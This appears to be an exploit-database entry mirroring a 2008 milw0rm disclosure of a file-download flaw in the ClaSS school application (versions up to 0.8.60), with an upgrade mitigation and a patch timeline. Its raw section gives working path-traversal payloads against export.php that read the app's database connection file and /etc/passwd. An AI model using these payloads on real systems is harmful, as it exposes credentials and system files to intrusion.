header-logo
Suggest Exploit
vendor:
ClaSS
by:
milw0rm
7.5
CVSS
HIGH
File Disclosure/Download
22
CWE
Product Name: ClaSS
Affected Version From: <=0.8.60
Affected Version To: 0.8.60
Patch Exists: YES
Related CWE: N/A
CPE: a:laex:class
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

ClaSS File Disclosure/Download

The ClaSS application is vulnerable to file disclosure/download attacks. An attacker can exploit this vulnerability by sending a crafted HTTP request to the export.php script with the ftype parameter set to a relative path to the file they wish to download. This can be used to download sensitive files such as school.php, dbh_connect.php, and /etc/passwd.

Mitigation:

Upgrade to version 0.8.61 or later.
Source

Exploit-DB raw data:

ClaSS
http://www.laex.org/class/


- <=0.8.60 -
magic_quotes_gpc = Off
register_globals = On


- File Disclosure/Download -
http://site/Class/class/scripts/export.php?ftype=
/../../path/to/Class/school.php
/../../path/to/Class/dbh_connect.php
/../../etc/passwd


- Timeline -
Author notified: Dec 19
Patch 0.8.61: Dec 19


- Seasons Greetings -
- http://nukeit.org -

# milw0rm.com [2008-12-24]

Navigation

Suggest Exploit

Services By CQR